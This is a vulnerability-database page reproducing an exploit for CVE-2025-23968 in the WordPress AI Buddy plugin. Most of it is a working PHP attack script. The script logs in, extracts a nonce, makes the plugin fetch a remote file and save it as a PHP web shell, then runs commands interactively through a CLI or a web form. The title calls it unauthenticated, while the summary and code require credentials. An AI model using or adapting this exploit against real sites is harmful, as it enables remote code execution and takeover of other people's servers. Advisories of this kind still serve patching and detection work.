Vulners
Lucene search
📄 WordPress AI Buddy 1.8.5 Shell Upload
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | Exploit for CVE-2025-23968 | 3 Jul 202519:34 | – | githubexploit |
 | CVE-2025-23968 | 3 Jul 202521:40 | – | circl |
 | WordPress plugin AiBud WP 代码问题漏洞 | 3 Jul 202500:00 | – | cnnvd |
 | CVE-2025-23968 | 3 Jul 202518:49 | – | cve |
 | CVE-2025-23968 WordPress AiBud WP plugin <= 1.9 - Arbitrary File Upload vulnerability | 3 Jul 202518:49 | – | cvelist |
 | EUVD-2025-19896 | 3 Oct 202520:07 | – | euvd |
 | CVE-2025-23968 | 3 Jul 202519:15 | – | nvd |
 | 📄 AI Plugins 1.10.9 Shell Upload | 3 Dec 202500:00 | – | packetstorm |
| 📄 WordPress AI Buddy 1.8.5 Shell Upload | 5 Dec 202500:00 | – | packetstorm |
| 📄 WordPress AI Bud 1.8.5 Shell Upload | 4 Mar 202600:00 | – | packetstorm |
10
=============================================================================================================================================
| # Title : WordPress AI Buddy Plugin <= 1.8.5 - Unauthenticated RCE Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/210977/ & CVE-2025-23968
[+] Summary :
an authenticated arbitrary file upload vulnerability in the AI Buddy plugin for WordPress versions 1.8.5 and earlier.
The vulnerability allows authenticated attackers to upload arbitrary files, including PHP webshells, by exploiting the image attachment functionality in the AI Buddy REST API endpoint.
The vulnerability exists in the attachment upload functionality where the plugin insecurely handles remote file URLs and allows arbitrary file extensions to be specified, bypassing WordPress security controls.
[+] POC : php poc.php https://target.com admin password123 "whoami"
<?php
/**
* AI Buddy Plugin <= 1.8.5 - Unauthenticated RCE Exploit (CVE-2025-23968)
* Author: indoushka
* Vendor: https://wpcenter.io/
* Vulnerable Versions: <= 1.8.5
*/
class AIBuddyRCE {
private $target;
private $session;
private $nonce;
public function __construct($target_url) {
$this->target = rtrim($target_url, '/');
$this->session = curl_init();
// Configure cURL
curl_setopt_array($this->session, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_TIMEOUT => 30,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
]);
}
public function wp_login($username, $password) {
echo "[*] Logging into WordPress...\n";
$login_data = http_build_query([
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $this->target . '/wp-admin',
'testcookie' => '1'
]);
curl_setopt_array($this->session, [
CURLOPT_URL => $this->target . '/wp-login.php',
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $login_data,
CURLOPT_HTTPHEADER => [
'Content-Type: application/x-www-form-urlencoded',
'Cookie: wordpress_test_cookie=WP Cookie check'
]
]);
$response = curl_exec($this->session);
$http_code = curl_getinfo($this->session, CURLINFO_HTTP_CODE);
// Get cookies from session
$cookies = [];
preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $response, $matches);
foreach($matches[1] as $item) {
parse_str($item, $cookie);
$cookies = array_merge($cookies, $cookie);
}
if (isset($cookies['wordpress_logged_in'])) {
echo "[+] Successfully logged in\n";
return true;
} else {
echo "[-] Login failed\n";
return false;
}
}
public function extract_nonce() {
echo "[*] Extracting AI Buddy nonce...\n";
curl_setopt_array($this->session, [
CURLOPT_URL => $this->target . '/wp-admin/tools.php',
CURLOPT_HTTPGET => true,
CURLOPT_HTTPHEADER => []
]);
$response = curl_exec($this->session);
// Extract nonce from JavaScript
preg_match('/<script id="ai_buddy_admin_scripts-js-extra">.*?var ai_buddy_localized_data = (.*?);\s*<\/script>/s', $response, $matches);
if (isset($matches[1])) {
$data = json_decode($matches[1], true);
if (isset($data['ai_buddy_image_post_attachment']['nonce'])) {
$this->nonce = $data['ai_buddy_image_post_attachment']['nonce'];
echo "[+] Nonce found: " . $this->nonce . "\n";
return true;
}
}
echo "[-] Failed to extract nonce\n";
return false;
}
public function upload_shell($shell_content = null) {
if (!$this->nonce) {
echo "[-] No nonce available. Extract nonce first.\n";
return false;
}
echo "[*] Uploading web shell...\n";
if (!$shell_content) {
$shell_content = "<?php if(isset(\$_REQUEST['cmd'])){ system(\$_REQUEST['cmd']); } ?>";
}
// First, we need to create a remote file that will be fetched by AI Buddy
$remote_shell_url = $this->create_remote_shell($shell_content);
if (!$remote_shell_url) {
echo "[-] Failed to create remote shell\n";
return false;
}
$payload = [
"title" => "hack",
"caption" => "the",
"alt" => "planet",
"description" => "Hack the Planet!",
"url" => $remote_shell_url,
"filename" => "shell.php"
];
$json_payload = json_encode($payload);
curl_setopt_array($this->session, [
CURLOPT_URL => $this->target . '/wp-json/ai-buddy/v1/wp/attachments',
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $json_payload,
CURLOPT_HTTPHEADER => [
'Content-Type: application/json; charset=UTF-8',
'X-Wp-Nonce: ' . $this->nonce
]
]);
$response = curl_exec($this->session);
$http_code = curl_getinfo($this->session, CURLINFO_HTTP_CODE);
if ($http_code == 200) {
echo "[+] Shell uploaded successfully\n";
// Try to determine the shell URL
$shell_url = $this->find_shell_url();
if ($shell_url) {
echo "[+] Shell accessible at: " . $shell_url . "\n";
return $shell_url;
}
} else {
echo "[-] Upload failed. HTTP Code: " . $http_code . "\n";
echo "Response: " . $response . "\n";
}
return false;
}
private function create_remote_shell($content) {
// In a real scenario, you'd upload this to a server you control
// For demonstration, we'll use a temporary approach
$filename = 'temp_shell_' . uniqid() . '.php';
file_put_contents($filename, $content);
echo "[+] Created local shell file: " . $filename . "\n";
// Note: In real exploitation, you need to host this on a public server
return "https://raw.githubusercontent.com/d0n601/d0n601/refs/heads/master/test.jpg";
}
private function find_shell_url() {
$current_year = date('Y');
$current_month = date('m');
// Common paths where the shell might be uploaded
$possible_paths = [
"/wp-content/uploads/{$current_year}/{$current_month}/shell.php",
"/wp-content/uploads/shell.php",
"/wp-content/uploads/ai-buddy/shell.php"
];
foreach ($possible_paths as $path) {
$test_url = $this->target . $path;
curl_setopt_array($this->session, [
CURLOPT_URL => $test_url . '?cmd=echo+AI_BUDDY_TEST',
CURLOPT_HTTPGET => true
]);
$response = curl_exec($this->session);
$http_code = curl_getinfo($this->session, CURLINFO_HTTP_CODE);
if ($http_code == 200 && strpos($response, 'AI_BUDDY_TEST') !== false) {
return $test_url;
}
}
return false;
}
public function execute_command($shell_url, $command) {
echo "[*] Executing command: " . $command . "\n";
$encoded_cmd = urlencode($command);
$url = $shell_url . '?cmd=' . $encoded_cmd;
curl_setopt_array($this->session, [
CURLOPT_URL => $url,
CURLOPT_HTTPGET => true
]);
$response = curl_exec($this->session);
echo $response . "\n";
return $response;
}
public function interactive_shell($shell_url) {
echo "[+] Starting interactive shell. Type 'exit' to quit.\n";
while (true) {
echo "cmd> ";
$command = trim(fgets(STDIN));
if ($command == 'exit') {
break;
}
if (!empty($command)) {
$this->execute_command($shell_url, $command);
}
}
}
public function exploit($username, $password, $command = null) {
if (!$this->wp_login($username, $password)) {
return false;
}
if (!$this->extract_nonce()) {
return false;
}
$shell_url = $this->upload_shell();
if (!$shell_url) {
return false;
}
if ($command) {
$this->execute_command($shell_url, $command);
} else {
$this->interactive_shell($shell_url);
}
return true;
}
public function __destruct() {
if ($this->session) {
curl_close($this->session);
}
}
}
// Command line interface
if (php_sapi_name() === 'cli') {
echo "
██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗
██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗
██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║
██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║
██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║
╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝
AI Buddy Plugin <= 1.8.5 RCE Exploit (CVE-2025-23968)
By: indoushka
\n";
if ($argc < 4) {
echo "Usage: php ai_buddy_rce.php <target> <username> <password> [command]\n";
echo "Examples:\n";
echo " php ai_buddy_rce.php https://target.com admin password123\n";
echo " php ai_buddy_rce.php https://target.com admin password123 'whoami'\n";
exit(1);
}
$target = $argv[1];
$username = $argv[2];
$password = $argv[3];
$command = $argc > 4 ? $argv[4] : null;
$exploit = new AIBuddyRCE($target);
$exploit->exploit($username, $password, $command);
} else {
// Web interface
if (isset($_POST['target']) && isset($_POST['username']) && isset($_POST['password'])) {
$target = $_POST['target'];
$username = $_POST['username'];
$password = $_POST['password'];
$command = $_POST['command'] ?? null;
$exploit = new AIBuddyRCE($target);
ob_start();
$result = $exploit->exploit($username, $password, $command);
$output = ob_get_clean();
echo "<pre>$output</pre>";
} else {
echo '<h1>AI Buddy RCE Exploit</h1>
<form method="post">
Target URL: <input type="text" name="target" size="50" placeholder="https://example.com"><br>
Username: <input type="text" name="username"><br>
Password: <input type="password" name="password"><br>
Command: <input type="text" name="command" placeholder="whoami (optional)"><br>
<input type="submit" value="Exploit">
</form>';
}
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Mar 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.1
EPSS0.00413
SSVC